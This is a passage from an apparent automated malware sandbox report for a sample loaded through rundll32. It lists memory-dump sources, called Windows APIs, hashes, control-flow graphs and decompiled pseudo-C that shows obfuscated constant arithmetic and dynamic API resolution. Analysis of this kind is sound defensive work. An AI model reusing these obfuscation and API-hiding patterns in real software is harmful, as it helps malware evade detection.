                                                                                                                      0x0018641a
                                                                                                                      0x0018641d
                                                                                                                      0x00000000
                                                                                                                      0x0018641d
                                                                                                                      0x001862be
                                                                                                                      0x00186342
                                                                                                                      0x00186356
                                                                                                                      0x0018635b
                                                                                                                      0x0018635e
                                                                                                                      0x00000000
                                                                                                                      0x0018635e
                                                                                                                      0x001862c0
                                                                                                                      0x001862c6
                                                                                                                      0x001862cc
                                                                                                                      0x001862d0
                                                                                                                      0x001862df
                                                                                                                      0x00186303
                                                                                                                      0x00186318
                                                                                                                      0x0018631a
                                                                                                                      0x00186324
                                                                                                                      0x0018632a
                                                                                                                      0x0018632f
                                                                                                                      0x0018632f
                                                                                                                      0x0018647f
                                                                                                                      0x00186485
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018648b
                                                                                                                      0x00186478
                                                                                                                      0x0018647a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: #~$/J$D)$T&s$V@$_2$$sQh $}
                                                                                                                      • API String ID: 1514166925-82791160
                                                                                                                      • Opcode ID: c19c309922fbec09a619c2bb065d1c185a01242fd7cdedea4032de92cc5c5827
                                                                                                                      • Instruction ID: bb8b6e8c6633272347e84aa13738ee698e55ef5e51bb778754263dedce18e5a5
                                                                                                                      • Opcode Fuzzy Hash: c19c309922fbec09a619c2bb065d1c185a01242fd7cdedea4032de92cc5c5827
                                                                                                                      • Instruction Fuzzy Hash: EB0212725083809FD3A8DF65C58A64FBBF1BBC5748F508A1DF19A8A260D7B08949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 179700-1799cc call 17cf25 call 191310 call 18679c 286 1799d1-1799d6 280->286 287 179a15 286->287 288 1799d8-1799da 286->288 291 179a17-179a1d 287->291 289 1799dc-1799e2 288->289 290 1799e8-179a13 call 184dad * 2 288->290 292 1799e3-1799e6 289->292 290->292 292->291
                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E00179700(WCHAR* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t207;
                                                                                                                      				void* _t231;
                                                                                                                      				void* _t232;
                                                                                                                      				signed int _t237;
                                                                                                                      				signed int _t238;
                                                                                                                      				signed int _t239;
                                                                                                                      				signed int _t240;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				void* _t243;
                                                                                                                      				intOrPtr _t265;
                                                                                                                      				WCHAR* _t268;
                                                                                                                      				void* _t271;
                                                                                                                      				void* _t272;
                                                                                                                      
                                                                                                                      				_t271 = _t272 - 0x58;
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x7c)));
                                                                                                                      				_t265 =  *((intOrPtr*)(_t271 + 0x6c));
                                                                                                                      				_t268 = __ecx;
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x78)));
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x74)));
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x70)));
                                                                                                                      				_push(_t265);
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x68)));
                                                                                                                      				_push(0);
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x60)));
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t207);
                                                                                                                      				 *(_t271 + 0x40) = 0x9c1626;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 8;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 4;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) + 0xfbea;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) ^ 0xc166ab3f;
                                                                                                                      				 *(_t271 + 0x50) = 0x2d866;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0xffff915f;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0x9947;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) << 8;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) ^ 0x03009f0e;
                                                                                                                      				 *(_t271 + 0x1c) = 0xb11a6d;
                                                                                                                      				_t237 = 0x61;
                                                                                                                      				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) * 0x53;
                                                                                                                      				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) | 0x3495d398;
                                                                                                                      				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) ^ 0x3dfc3820;
                                                                                                                      				 *(_t271 + 0x28) = 0x82663;
                                                                                                                      				 *(_t271 + 0x28) =  *(_t271 + 0x28) * 0x55;
                                                                                                                      				 *(_t271 + 0x28) =  *(_t271 + 0x28) / _t237;
                                                                                                                      				 *(_t271 + 0x28) =  *(_t271 + 0x28) ^ 0x000fae18;
                                                                                                                      				 *(_t271 + 0xc) = 0xaf113;
                                                                                                                      				 *(_t271 + 0xc) =  *(_t271 + 0xc) | 0x96b3e95f;
                                                                                                                      				 *(_t271 + 0xc) =  *(_t271 + 0xc) ^ 0x96be4803;
                                                                                                                      				 *(_t271 + 0x30) = 0x440ee2;
                                                                                                                      				 *(_t271 + 0x30) =  *(_t271 + 0x30) << 2;
                                                                                                                      				_t238 = 0x3a;
                                                                                                                      				 *(_t271 + 0x30) =  *(_t271 + 0x30) * 0x27;
                                                                                                                      				 *(_t271 + 0x30) =  *(_t271 + 0x30) ^ 0x297e7faa;
                                                                                                                      				 *(_t271 + 8) = 0x67057e;
                                                                                                                      				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7e99d1b;
                                                                                                                      				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7839d84;
                                                                                                                      				 *(_t271 + 0x38) = 0x1c9970;
                                                                                                                      				 *(_t271 + 0x38) =  *(_t271 + 0x38) * 0x7c;
                                                                                                                      				 *(_t271 + 0x38) =  *(_t271 + 0x38) + 0xffff63ab;
                                                                                                                      				 *(_t271 + 0x38) =  *(_t271 + 0x38) ^ 0x0ddf815b;
                                                                                                                      				 *(_t271 + 0x54) = 0x9de9b7;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) / _t238;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) | 0x8a1e8ac2;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) + 0x89e3;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) ^ 0x8a1a691c;
                                                                                                                      				 *(_t271 + 0x48) = 0xcb1eea;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) + 0xac00;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x8f71cfce;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0xa15123d8;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x2ee8c557;
                                                                                                                      				 *(_t271 + 0x20) = 0xb0d713;
                                                                                                                      				 *(_t271 + 0x20) =  *(_t271 + 0x20) + 0xc72b;
                                                                                                                      				 *(_t271 + 0x20) =  *(_t271 + 0x20) >> 4;
                                                                                                                      				 *(_t271 + 0x20) =  *(_t271 + 0x20) ^ 0x0005ac28;
                                                                                                                      				 *(_t271 + 0x18) = 0xfc2615;
                                                                                                                      				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29594ddd;
                                                                                                                      				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29a8e047;
                                                                                                                      				 *(_t271 + 0x4c) = 0x55d93;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x83f0b4dd;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) * 0x1f;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) >> 6;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x03ebee2a;
                                                                                                                      				 *(_t271 + 0x24) = 0xa7d31;
                                                                                                                      				_t239 = 0x67;
                                                                                                                      				 *(_t271 + 0x24) =  *(_t271 + 0x24) / _t239;
                                                                                                                      				_t240 = 0x64;
                                                                                                                      				 *(_t271 + 0x24) =  *(_t271 + 0x24) * 0x77;
                                                                                                                      				 *(_t271 + 0x24) =  *(_t271 + 0x24) ^ 0x000a2b61;
                                                                                                                      				 *(_t271 + 0x14) = 0x947781;
                                                                                                                      				_t241 = 0x11;
                                                                                                                      				 *(_t271 + 0x14) =  *(_t271 + 0x14) / _t240;
                                                                                                                      				 *(_t271 + 0x14) =  *(_t271 + 0x14) ^ 0x0008efbc;
                                                                                                                      				 *(_t271 + 0x2c) = 0x75c872;
                                                                                                                      				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) / _t241;
                                                                                                                      				_t242 = 0x74;
                                                                                                                      				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) * 0x27;
                                                                                                                      				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) ^ 0x010d2973;
                                                                                                                      				 *(_t271 + 0x10) = 0x81f543;
                                                                                                                      				_t149 = _t271 - 0x4c; // 0x10f16291
                                                                                                                      				 *(_t271 + 0x10) =  *(_t271 + 0x10) / _t242;
                                                                                                                      				 *(_t271 + 0x10) =  *(_t271 + 0x10) ^ 0x0000d691;
                                                                                                                      				 *(_t271 + 0x3c) = 0x7405f8;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xe39458d4;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xc0d1562e;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) + 0xffff0384;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0x233c26a4;
                                                                                                                      				 *(_t271 + 0x34) = 0x5a2607;
                                                                                                                      				 *(_t271 + 0x34) =  *(_t271 + 0x34) | 0x05401af1;
                                                                                                                      				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbbb735af;
                                                                                                                      				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbee5cf81;
                                                                                                                      				 *(_t271 + 0x44) = 0xea1272;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xffff82c7;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) | 0x60f8fd5f;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xdb64;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) ^ 0x60f501b5;
                                                                                                                      				_push( *(_t271 + 0x28));
                                                                                                                      				_push( *(_t271 + 0x1c));
                                                                                                                      				_push( *(_t271 + 0x50));
                                                                                                                      				_push( *(_t271 + 0x40));
                                                                                                                      				_t243 = 0x44;
                                                                                                                      				E00191310(_t243, _t149);
                                                                                                                      				 *((intOrPtr*)(_t271 - 0x4c)) = 0x44;
                                                                                                                      				_t183 = _t271 - 0x4c; // 0x10f16291
                                                                                                                      				_t189 = _t271 - 8; // 0x10f162d5
                                                                                                                      				_t231 = E0018679C(_t268,  *(_t271 + 0xc), _t189,  *(_t271 + 0x30), _t243,  *(_t271 + 8),  *(_t271 + 0x38),  *(_t271 + 0x54),  *(_t271 + 0x48), _t243, _t183,  *(_t271 + 0x20), _t243,  *(_t271 + 0x18), _t243, _t243,  *((intOrPtr*)(_t271 + 0x70)),  *((intOrPtr*)(_t271 + 0x60))); // executed
                                                                                                                      				if(_t231 == 0) {
                                                                                                                      					_t232 = 0;
                                                                                                                      				} else {
                                                                                                                      					if(_t265 == 0) {
                                                                                                                      						E00184DAD( *(_t271 + 0x4c),  *(_t271 + 0x24),  *((intOrPtr*)(_t271 - 8)),  *(_t271 + 0x14),  *(_t271 + 0x2c));
                                                                                                                      						E00184DAD( *(_t271 + 0x10),  *(_t271 + 0x3c),  *((intOrPtr*)(_t271 - 4)),  *(_t271 + 0x34),  *(_t271 + 0x44));
                                                                                                                      					} else {
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      					}
                                                                                                                      					_t232 = 1;
                                                                                                                      				}
                                                                                                                      				return _t232;
                                                                                                                      			}


















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: a+
                                                                                                                      • API String ID: 963392458-552692850
                                                                                                                      • Opcode ID: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction ID: a40b1691a2bec2fa1ec22d56b07cde3d95bfb406bead77f1cd2df4cdf9bdda54
                                                                                                                      • Opcode Fuzzy Hash: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction Fuzzy Hash: 38A1EF72500248EBDF59CF64C94A9CE3BA2FF48358F119219FE199A260D3B6D995CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(006E78E8), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(006E78E8), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 17ea7b-17eb35 call 17cf25 call 172d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0017EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t41;
                                                                                                                      				intOrPtr* _t50;
                                                                                                                      				void* _t51;
                                                                                                                      				signed int _t52;
                                                                                                                      				signed int _t53;
                                                                                                                      				void* _t60;
                                                                                                                      
                                                                                                                      				_t60 = __edx;
                                                                                                                      				E0017CF25(_t41);
                                                                                                                      				_v16 = 0xd33285;
                                                                                                                      				_v16 = _v16 + 0xd9cb;
                                                                                                                      				_v16 = _v16 | 0xd94823ae;
                                                                                                                      				_v16 = _v16 ^ 0xd9d95ea2;
                                                                                                                      				_v8 = 0xf9f040;
                                                                                                                      				_v8 = _v8 ^ 0x026675a4;
                                                                                                                      				_t52 = 0x46;
                                                                                                                      				_v8 = _v8 / _t52;
                                                                                                                      				_t53 = 0x2b;
                                                                                                                      				_v8 = _v8 / _t53;
                                                                                                                      				_v8 = _v8 ^ 0x000f054e;
                                                                                                                      				_v12 = 0x255c2b;
                                                                                                                      				_v12 = _v12 ^ 0x0b9b7933;
                                                                                                                      				_v12 = _v12 + 0xffff1ebc;
                                                                                                                      				_v12 = _v12 ^ 0x0bb758ac;
                                                                                                                      				_t50 = E00172D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
                                                                                                                      				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
                                                                                                                      				return _t51;
                                                                                                                      			}













                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0017EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: c860c04aadc6453d88f4ce89c49faf9fe2572f6d2fc77da99d7c8208b8fd423f
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: A7119732D00208BBDB14DEE6C94A8DFBFB6EB85310F10C099F508A6210E7714B61AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 225 10001b80-10001b90 226 10001b92-10001b97 225->226 227 10001b9c-10001ba8 225->227 228 10001c9c-10001c9f 226->228 229 10001c04-10001c66 227->229 230 10001baa-10001bb5 227->230 231 10001c74-10001c91 VirtualProtect 229->231 232 10001c68-10001c71 229->232 233 10001bb7-10001bbe 230->233 234 10001bfa-10001bff 230->234 235 10001c93-10001c95 231->235 236 10001c97 231->236 232->231 237 10001bc0-10001bce 233->237 238 10001be2-10001bf4 VirtualFree 233->238 234->228 235->228 236->228 237->238 239 10001bd0-10001be0 237->239 238->234 239->234 239->238
                                                                                                                      APIs
                                                                                                                      • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction ID: 18a5c97ed4e363b13208c3a7f4c71130bffb6d6a25a92aa7c7569a15449bf2a4
                                                                                                                      • Opcode Fuzzy Hash: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction Fuzzy Hash: 7141B9746001099FEB48CF58C490FA9B7B2FB88350F14C659E91A9F395D731EE41CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
